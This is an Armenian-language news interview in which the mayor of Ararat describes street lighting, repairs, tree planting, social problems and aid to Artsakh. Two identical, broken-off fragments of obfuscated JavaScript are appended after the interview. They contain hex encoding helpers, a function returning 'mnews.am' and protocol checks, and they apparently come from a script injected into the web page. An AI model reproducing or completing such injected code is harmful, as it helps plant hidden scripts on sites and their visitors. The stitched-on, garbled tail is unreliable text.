Լինե՛լ առավել հանդուրժող և լավատես. Հայկ Հայկյան

24

Հայկ Հայկյան. Արարատի քաղաքապետ

Քաղաքապետ Հայկ Հայկյանը հպարտ է ,որ հատկապես Արարատում է  ծնվել և մեծացել և այսօր փորձում է օգտակար լինել իր քաղաքին .«Եթե չսիրես ծննդավայրդ,ոչինչ անել չես կարող ժողովրդին դատարկ ճառեր պետք չեն, նա շուտ է զգում կեղծիքը, ինչը հետո ծանրանալու է իր ուսերին»:

–Պրն. Հայկյան,շուրջ երեք տարի է , ինչ դուք պաշտոնավարում եք որպես Արարատի քաղաքապետ,ինչպիսի՞ն էր աշխատանքային մեկնարկը,ի՞նչ խնդիրներ կարողացաք ավարտին հասցնել այս ժամանակահատվածում:

-Տարիներ շարունակ Արարատում հավաքվել են բազմաթիվ  և բազմաբնույթ խնդիրներ,որոնց լուծման համար եմ ես ցանկություն հայտնել ընտրվելու Արարատի քաղաքապետ:Պաշտոնավարման առաջին իսկ օրվանից, երբ փորձեցի դասակարգել և  լուծել  դրանք, հանդիպեցի  դժվարությունների, խոչընդոտների, քանի որ ինչպես ասում են,ցանկությունները շատ են, հնարավորությունները՝ քիչ: Ծառացած խնդիրների լուծումները պահանջում են ժամանակ: Ես սկզբունքորեն դեմ եմ այնպիսի աշխատանքների կատարմանը, որոնք խիստ մակերեսային են,բայց տեսանելի: Ես կողմնակից եմ հիմնարար փոփոխությունների,որի արդյունքում տեսանելին կլինի երկարատև  և  ինքնակարգավորվող: Թող բարձր չհնչի ասածս, իսկապես քաղաքում բոլորին վերաբերում եմ իմ հարազատի պես,այդ իսկ պատճառով որևէ դժվարության չեմ հանդիպել:

-Պրն. Հայկյան արարատցին ինչպե՞ս է կարողանում լուծել իր սոցիալական խնդիրները:

-Ես ամեն օր ցավով բախվում եմ մեր քաղաքի բնակիչների սոցիալական խնդիրների հետ:Քաղաքապետարանը կարծես,դարձել է սոցիալական օգնության տրամադրման կառույց: Պետք է խոսեմ երևույթի նաև հակառակ կողմի մասին.նույն օգնություն ակնկալողներին,երբ որ առաջարկում ես ինչ որ աշխատանք,նրանք միանգամից հրաժարվում են:Մենք հետ ենք վարժվել աշխատելուց կամ աշխատանքով ապրելուց: Մարդիկ կարծում են, որ ներկայումս մեկը մյուսին պարտական է ինչ որ բանով, սակայն չեն կարողանում հասկանալ ,որ ամենինչ գալիս է աշխատանք չգտնելուց, չաշխատելուց:Հետաքրքիրը գիտեք որն է ,աշխատանք չունենալու պատճառներից նաև  ցանկանում եմ ավելացնել  ներկայիս երիտասարդությունը  իսկապես չի ցանկանում աշխատել , ամենինչ միանգամից  է ուզում ունենալ, առանց ետևում կյանքի պատմություն թողնելով: Սակայն այդ խնդիրը ևս փորձում ենք հաղթահարել և հասնել արդյունքի:

-Պարոն Հայկյան,  ի՞նչ աշխատանքներ եք իրականացրել այս մի քանի տարիների  ընթացքում:

-Քաղաքի լուսավորության հարցն եմ համարել առաջնային հարցերից մեկը: Շուրջ 30 տարի Արարատ քաղաքի փողոցները լուսավորված չէին: Բավականին աշխատանքներ  կարողացանք կատարել այդ ուղղությամբ, լուսավորված են համարյա թե բոլոր փողոցները, եթե երեկոյան լինեք  քաղաքում  շատ ավելի տպավորված կզգաք փոփոխությունները: Մարդկանց անվտանգության մասին առաջին հերթին մտածելով կատարեցինք այդ լայնածավալ աշխատաքները:Այս պահին  քաղաքում իրականացվում է երեք բակերի վերականգման և վերանորոգման աշխատանքներ, ինչպես նաև  խմելու ջրի ջրագծերն են փոխվում,որոնք քայքայված վիճակում էին,որից հետո կսկսենք ասֆալտապատման աշխատանքներ իրականացնել: Առաջիկայում բազմաբնակարան շենքերի մուտքերի վերանորոգման աշխատանքներ են նախատեսված: Գործի մեջ մինչև չես մտնում, ծանրությունը չես պատկերացնում: Քաղաքի սանիտարական մաքրությանը խստորեն հետևում եմ  անձամբ  , հայտնաբերելու և պատժելու համար այն քաղաքացիներին, ովքեր կենցաղային աղբը գցում են ոչ ավել, ոչ պակաս հենց քաղաքի կենտրոնում` անգամ հրապարակին հարող տարածքում: Ամեն դեպքում բնագավառը շատ լավ վիճակում է, մաքուր վիճակում է քաղաքը: Աղբամանների մոտ շուտով արդեն դռներ պետք է տեղադրվեն, պահակակետ կունենա, որպեսզի ավելի կոկիկ լինի, մեր հնարավորության սահմաներում կանենք:

-Պրն. Հայկյան,մի փոքր խոսենք ձեր առաջիկա ծրագրերից:

-Քաղաքի զարգացման համար մշակված քառամյա իրատեսական ծրագրում ներառված են այն խնդիրները ,որոնք ակնկալում ենք լուծել առաջիկա  չորս տարիների ընթացքում:Կարծում եմ ,որ մենք չորս  տարի հետո ասելիք կունենանք,այսինքն այն , ինչը նախատեսել էինք կատարելու,և այն, ինչը դեռ  շարունակելիության ապահովման կարիք ունի: Նախընտրական ծրագրում ինչ խոստացել եմ ,կարծում եմ բոլորը կետ առ կետ կկատարվեն այս տարիների ընթացքում: Տեսեք այսօր անսպասելի եկել եք քաղաք, և տեսնում  ենք ամեն մեկն իր գործին են, մի մասը կանաչապատման աշխատանքներ են իրականացնում, գազոններ են կառուցվում: Անցած տարվանից սկսած ծառատունկ ենք իրականացնում, կանաչապատման աշխատանքներն ավելի զարգացնելու և քաղաքն ավելի գեղեցկացնելու նպատակով: Անցած տարվանից արդեն Բնապահպանության նախարարությունը մեզ 1000 հատ տնկիներ նվիրաբերեց, մի մասը տնկեցինք աշնանը, իսկ մյուս մասը շուտով կանենք: Ծառերը բաժանվեցին և՛  դպրոցի երեխաներին, և՛ հասարակ բնակչությանը: Եվ հավատացե՛ք, բավականին արդյունավետ ծրագիր էր, իրեն արդարացրեց: Նախորդ շաբաթ  համաքաղաքային շաբաթօրյակ իրականացրեցինք, թեև քաղաքը մաքրության խնդիր չունի, այնուամենայնիվ միշտ էլ աշխատելու տեղ կգտնվի, յուրաքանչյուրն իր հնարավորությունների սահմաներում: Ջրման աշխատանքներից ասեմ, անցած տարի կարգավորեցինք  այգու ոռոգման համակարգերը, այս տարի ևս գազոնների ոռոգման հիմնական տեղերում մասնավորեցրեցինք մեր աշխատանքները: Մենք ունենք ընդամենը մեկ արտեզյան հոր, որը բավականացնում է քաղաքի ընդամենը մեկ հատվածի համար, բայց համենայն դեպս կարողանում ենք քաղաքը կանաչ միջավայրում պահել: Ջրցան մեքենաներով ենք կատարում ջրելու աշխատանքներ, որը մեզ բավարարում է , կարողանում ենք ծառերը ժամանակին խնամել: Առանց այն էլ  մեր քաղաքը փոշոտ է , մեր գործը բարդ է: Թեև աշխատանքը շատ է և շարունակական, այնուամենայնիվ խրախուսական մրցանակի ենք արժանացել նախորդ տարում. «Տարվա լավագույն մաքուր քաղաք» տիտղոսին ենք արժանացել:

Մենք այս տարվա ընթացքում բազում ծրագրեր ունենք, որը նախորդ տարի բյուջեով հաստատել ենք: Ունենք ասֆալտապատման, մանկապարտեզների խոհանոցների և սանհանգույցների  վերանորոգման, լուսավորության աշխատանքներ, մշակույթի տան պատուհանների փոխում, սպորտ դպրոցի գազաֆիկացում,  նախահաշվարկային աշխատանքներն արված են, մենք արդեն սկսել ենք  քաղաքի լուսավորության աշխատանքերը: Այս տարի լուսավորություն ունենք անելու 4 երկար փողոցներում, քաղաքի համար կարևորագույն նշանակություն ունեցող փողոցներ են: Ասֆալտապման աշխատանքներից  օրինակ. Գրիբոյեդով փողոցը մասնակի ասֆալտապատեվել է , իսկ  հաջորդ տարում արդեն  մյուս կեսը, այնուհետև փոսալցումներ ունենք, որը շարունակ իրականացնում ենք: Բակային աշխատանքերին մեծ ուշադրություն ենք դարձնում ,ունենք արդեն 10 խաղահրապարակ, իրենց ցանկապատերով, ճոճանակներով և այլ խաղերով հարուստ է:  Ոչ մի մեքենա չի կարող մոտենալ խաղահրապարակին, մաքսիմալ ապահովվ է,միայն մարդկանց համար է ելումուտը: Սպորտդպրոցը գազաֆիկացում չի ունեցել երբևիցե,  մեր մարզիկներն արժանի են, որպեսզի էլ ավելի մեծ նվաճումների կարողանան հասնել: Առաջին անհրաժեշտության գործերը կանենք, այնուհետև կապիտալ վերանորոգումների մասին կմտածենք: Չմոռանամ, նշել նաև էներգոխնայողության համակարգերով ենք ցանկանում հարստացնել քաղաքը, այդ միջամտությամբ լուսավորությունն առավել մատչելի կլինի և քաղաքի բյուջեին էական հարված չի հասցնի: Դրա հետևանքով խնայված դրամական միջոցները կտրամադրվեն հետագա բազում  աշխատանքերն իրականացնելուն:՛

-Ձեր բարեմաղթանքը համաքաղաքացիներին:

-Ամեն գործ սրտի թրթիռով եմ արել, փորձելով մեր համաքաղաքացիների մեջ տարածել մեկ կարևորագույն սկզբունք,որ քաղաքը բոլորինսն է , և բոլորս պարտավոր ենք հոգ տանել մեր քաղաքի մասին միավորվելով և համախմբվելով ինչպես մեկ ընտանիք և միասնական լինենք թե ձեռքբերումների, թե  ձախողումների ժամանակ:

Կցանկանայի մեր բնակչությանն ասել,որ փորձեն լինել առավել հանդուրժող,լավատես,հավատան,որ մեր վաղվա օրն ավելի լավ ու պայծառ է լինելու և  վաղվա սերունդներին փոխանցեն ավելի լավ Հայաստան՝ հզոր ու պաշտպանված: Մենք լինելով աշխարհի հին ազգերից մեկը, ունենք առավել լավ և բարեկեցիկ պայմաններում ապրելու իրավունք:

-Այս օրերին ի՞նչ օգնություն է ցուցաբերել Արարատ քաղաքը Արցախին:

-Արարատի մարզի  համայնքները, մարզի առողջապահական և կրթամշակութային կազմակերպությունները շարունակում են ամենատարբեր կարգի օգնություններ հասցնել Արցախի խաղաղ բնակչությանը , առաջնագծում գտնվող զինվորներին ու կամավորներին: Արարատի  մարզպետ Ռուբիկ Աբրահամյանի նախաձեռնությամբ և իհարկե մեր բոլորի  ցանկությամբ  հանգանակել եւ համապատասխան հաշվին ենք փոխանցել դրամական օժանդակություն ,ինչպես նաև մեքենաներով բեռնված սննդամթերք, հագուստ, ծխախոտ, առաջին անհրաժեշտության այլ պարագաներ …

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "mnews.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "mnews.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e